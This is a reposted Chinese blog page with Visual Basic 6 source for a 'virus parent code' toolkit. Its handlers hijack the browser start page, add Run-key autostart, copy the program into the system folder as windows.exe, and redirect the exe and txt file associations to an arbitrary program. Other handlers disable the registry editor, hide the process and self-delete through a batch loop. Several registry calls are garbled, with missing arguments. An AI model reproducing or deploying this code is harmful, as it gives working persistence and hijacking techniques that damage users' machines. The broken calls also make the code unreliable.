VB制造病毒母代码

概述VERSION 5.00 Begin VB.Form Form1    BorderStyle     =   1  'Fixed Single    Caption         =   "6331905VB制造病毒母代码"    ClientHeight    =   6630    ClientLeft      =   45    ClientTop       =   435    C

VERSION 5.00
Begin VB.Form Form1
borderStyle = 1 'Fixed Single
Caption = "6331905VB制造病毒母代码"
ClIEntHeight = 6630
ClIEntleft = 45
ClIEnttop = 435
ClIEntWIDth = 7815
Icon = "Form1.frx":0000
linktopic = "Form1"
Maxbutton = 0 'False
Minbutton = 0 'False
ScaleHeight = 6630
ScaleWIDth = 7815
StartUpposition = 2 '屏幕中心
Begin VB.Commandbutton Command14
Caption = "清除感染txt"
Height = 495
left = 4440
TabIndex = 18
top = 2880
WIDth = 975
End
Begin VB.Commandbutton Command13
Caption = "清除感染exe"
Height = 495
left = 4440
TabIndex = 17
top = 2040
WIDth = 975
End
Begin VB.PictureBox Picture1
Appearance = 0 'Flat
Backcolor = &H80000005&
Forecolor = &H80000008&
Height = 5655
left = 5640
Picture = "Form1.frx":08FF
ScaleHeight = 5625
ScaleWIDth = 1905
TabIndex = 16
top = 840
WIDth = 1935
End
Begin VB.Commandbutton Command12
Caption = "感染txt文件"
Height = 495
left = 3120
TabIndex = 15
top = 2880
WIDth = 1215
End
Begin VB.Commandbutton Command11
Caption = "木马自删除"
Height = 495
left = 3120
TabIndex = 14
top = 5400
WIDth = 2295
End
Begin VB.Commandbutton Command10
Caption = "隐藏应用程序"
Height = 495
left = 600
TabIndex = 11
top = 5400
WIDth = 1695
End
Begin VB.Commandbutton Command9
Caption = "隐藏进程"
Height = 495
left = 600
TabIndex = 10
top = 4560
WIDth = 1695
End
Begin VB.Commandbutton Command8
Caption = "修改默认键值"
Height = 495
left = 3120
TabIndex = 8
top = 4560
WIDth = 2295
End
Begin VB.Commandbutton Command7
Caption = "修改非默认键值"
Height = 495
left = 3120
TabIndex = 7
top = 3720
WIDth = 2295
End
Begin VB.Commandbutton Command6
Caption = "感染exe文件"
Height = 495
left = 3120
TabIndex = 6
top = 2040
WIDth = 1215
End
Begin VB.Commandbutton Command5
Caption = "将程序复制到系统目录命名为windows.exe并且开机自启动"
Height = 855
left = 3120
TabIndex = 5
top = 840
WIDth = 2295
End
Begin VB.Commandbutton Command4
Caption = "禁止访问注册表"
Height = 495
left = 600
TabIndex = 4
top = 3720
WIDth = 1695
End
Begin VB.Commandbutton Command3
Caption = "可以访问注册表"
Height = 495
left = 600
TabIndex = 3
top = 2880
WIDth = 1695
End
Begin VB.Commandbutton Command2
Caption = "开机自启动"
Height = 495
left = 600
TabIndex = 2
top = 2040
WIDth = 1695
End
Begin VB.TextBox Text1
Appearance = 0 'Flat
Height = 270
left = 600
TabIndex = 1
Text = "**"
top = 840
WIDth = 1695
End
Begin VB.Commandbutton Command1
Caption = "修改主页"
Height = 495
left = 600
TabIndex = 0
top = 1200
WIDth = 1695
End
Begin VB.Label Label3
Caption = "写于2007.6.30日"
Height = 255
left = 720
TabIndex = 13
top = 6240
WIDth = 1455
End
Begin VB.Label Label2
Caption = "QQ:6331905"
BeginProperty Font
name = "宋体"
Size = 18
Charset = 134
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Forecolor = &H000000FF&
Height = 375
left = 3240
TabIndex = 12
top = 6120
WIDth = 1935
End
Begin VB.Shape Shape1
bordercolor = &H80000000&
Height = 1085
left = 480
top = 720
WIDth = 1940
End
Begin VB.Label Label1
Caption = $"Form1.frx":6100
Height = 615
left = 360
TabIndex = 9
top = 120
WIDth = 7095
End
End
Attribute VB_name = "Form1"
Attribute VB_GlobalnameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredID = True
Attribute VB_Exposed = False
Option Explicit
Dim systempath As String
Private Sub Command1_Click() '修改主页
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER,"Software/Microsoft/Internet Explorer/Main",hKey
RegSetValueEx hKey,"Start Page",REG_SZ,ByVal Me.Text1.Text,30
If Me.Text1.Text = "" Then
RegSetValueEx hKey,ByVal "about:blank",30
RegCloseKey hKey
End If
End Sub

Private Sub Command10_Click()
App.TaskVisible = False '隐藏应用程序
End Sub

Private Sub Command11_Click()
Dim s As String
On Error Resume Next
s = CurDir '当前目录
'保证目录最后的字符为 "/"
If Right(s,1) <> "/" Then
s = s & "/"
End If '在当前目录下创建bat文件
Open s & "kill.bat" For Output As #1
Print #1,":redel"
Print #1,"del " & Chr(34) & s & App.EXEname & ".exe" & Chr(34)
Print #1,"if exist " & Chr(34) & s & App.EXEname & ".exe" & Chr(34) & " goto redel"
Print #1,"del %0"
Print #1,
Close #1
Shell Chr(34) & s & "kill.bat" & Chr(34)
End
End Sub

Private Sub Command12_Click() '感染txt文件,描述见下面感染exe文件,txt文件默认数据为C:/windows/notepad.exe %1

Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT,"txtfile/shell/open/command/","",ByVal "C:/1.exe",30
RegCloseKey hKey
Dim a As String
a = Command()
If a = "" Then
Else
Shell a,1
End If
End Sub

Private Sub Command13_Click() '清除感染exe文件
Dim x As String
x = Chr$(34) + "%1" + Chr$(34) + Chr$(32) + "%*"
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT,"exefile/shell/open/command/",ByVal x,30
RegCloseKey hKey
End Sub

Private Sub Command14_Click() '清除感染txt文件
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT,ByVal "C:/windows/notepad.exe %1",30
RegCloseKey hKey
Dim a As String
End Sub

'如果让程序开机运行，需要先把文件编译为可执行文件放到特定目录下，
'并修改注册表让其开机便运行，
'路径是/HKEY_LOCAL_MACHINE/Software/Microsoft/windows/CurrentVerson/Run
Private Sub Command2_Click() '无论该文件放在什么位置都可以实现开机自启动
Dim hKey As Long,SubKey As String,Exe As String
SubKey = "Software/Microsoft/windows/CurrentVersion/Run"
Exe = App.Path & "/" & App.EXEname & ".exe"
RegCreateKey HKEY_LOCAL_MACHINE,SubKey,"19911593",ByVal Exe,LenB(StrConv(Exe,vbFromUnicode)) + 1
RegCloseKey hKey
End Sub

'禁止修改注册表方法为:
'展开注册表到
'HKEY_CURRENT_USER/Software/Microsoft/windows/CurrentVersion/PolicIEs/System
'下，新建一个名为disableRegistryTools的DWORD值，并将其值改为“1”，即可禁止使用注册表编辑器Regedit，"0"为可用
Private Sub Command3_Click() '可以使用注册表
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER,"Software/Microsoft/windows/CurrentVersion/PolicIEs/System","disableRegistryTools",REG_DWORD,0&,4

'0&就是设置DWORD值为0,1&就是设置DWORD值为1
RegCloseKey hKey
End Sub

Private Sub Command4_Click() '禁止使用注册表
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER,1&,4
RegCloseKey hKey

End Sub

Private Sub Command5_Click() '将程序复制到系统目录
systempath = String(255,Chr(0))
GetSystemDirectory systempath,254
systempath = left(systempath,InStr(systempath,Chr(0)) - 1)
'先检查系统目录有无windows.exe文件，如果没有，自我复制到系统目录命名为windows.exe
If Not Dir(systempath & "/" & "windows.exe") = "windows.exe" Then
filecopy App.Path & "/" & App.EXEname & ".exe",systempath & "/" & "windows.exe"
End If
'以下为设置系统目录的windows.exe为开机自启动，名称为6331905，数据为windows.exe
Dim hKey As Long,Exe As String
SubKey = "Software/Microsoft/windows/CurrentVersion/Run"
Exe = (systempath & "/" & "windows.exe")
RegCreateKey HKEY_LOCAL_MACHINE,"6331905",vbFromUnicode)) + 1
RegCloseKey hKey
End Sub

'VB制作EXE文件关联，并运行指定文件，其实就是修改默认键值
'原理: 实现该程序主要是修改注册表的数据值
'1.在注册表HKEY_CLASSES_ROOT/exefile/shell/open/command/的默认数据值为"%1" %*
'该"%1" %*默认数据值控制着exe文件的打开

'2.只要修改默认数据值就可以实现文件关联
'比如，把"%1" %*修改为c:/1.exe %1，请大家在c:/放1个任何1.exe文件，看看运行
'你电脑里面的任何exe程序会发生什么效果

'说明:
'(1) "%1" %*则表示所有EXE文件本身直接运行(EXE 可以直接运行，
'所以用表示程序本身的%1即可)，后面的%*则表示程序命令后带的所有参数
'(这就是为什么EXE文件可以带参数运行的原因)。
'(2) 1.exe %1，表示将所有文件类型为EXE(exefile表示为EXE类型文件)的
'文件都通过“记事本”程序打开，后面的%1表示要打开的程序本身(就是双击时的那个程序)。

Private Sub Command6_Click()

Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT,ByVal "c:/1.exe %1",30
RegCloseKey hKey
Dim a As String '定义一个字符变量，用来存放当前文件的绝对路径
a = Command() '将绝对路径存放到变量a中
If a = "" Then '如果a的路径为空，则什么都不执行
Else '否则执行程序
Shell a,1 '这是打开变量a指定路径的文件，运行参数为默认
End If
End Sub

Private Sub Command7_Click() '修改HKEY_CURRENT_USER/Console/Facenamed的键值
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER,"Console/","Facename",ByVal "16697000",30
RegCloseKey hKey
End Sub

Private Sub Command8_Click() '修改HKEY_CURRENT_USER/Console的默认键值
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER,30
RegCloseKey hKey

End Sub

Private Sub Command9_Click() '该隐藏进程方法在原版XP2上通过，在雨林木风GHOST版本未通过，有研究的愿意交流 HIDeCurrentProcess '隐藏进程 End Sub

总结

以上是内存溢出为你收集整理的VB制造病毒母代码全部内容，希望文章能够帮你解决VB制造病毒母代码所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错，欢迎将内存溢出网站推荐给程序员好友。